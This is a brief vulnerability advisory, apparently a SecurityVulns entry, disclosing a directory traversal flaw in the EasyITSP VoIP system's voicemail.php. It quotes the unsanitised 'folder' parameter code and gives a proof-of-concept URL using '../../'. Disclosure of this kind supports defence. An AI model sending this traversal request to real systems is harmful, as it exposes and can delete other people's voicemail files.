Directory Traversal - EasyITSP <= 2.0.7

2013-02-11T00:00:00
ID SECURITYVULNS:DOC:29041
Type securityvulns
Reporter Securityvulns
Modified 2013-02-11T00:00:00

Description

Directory Traversal - EasyITSP <= 2.0.7

EasyITSP - Telephone System VoIP

http://blaszczakm.blogspot.com Michal Blaszczak

Search/Read/Delete filetype .txt Search/Play/Delete filetype .wav - Voicemail

file: voicemail.php line: 220

foreach (glob("$vmdir/$_SESSION[phone]/$vmfolder/*.txt") as $filename) {

file: voicemail.php line: 186 - 190

if(isset($_GET['folder'])) { $vmfolder = $_GET['folder']; } else { $vmfolder = "INBOX"; }

POC: http:///easyitsp/WEB/customer/voicemail.php?currentpage=phones&folder=../../

Michal Blaszczak http://blaszczakm.blogspot.com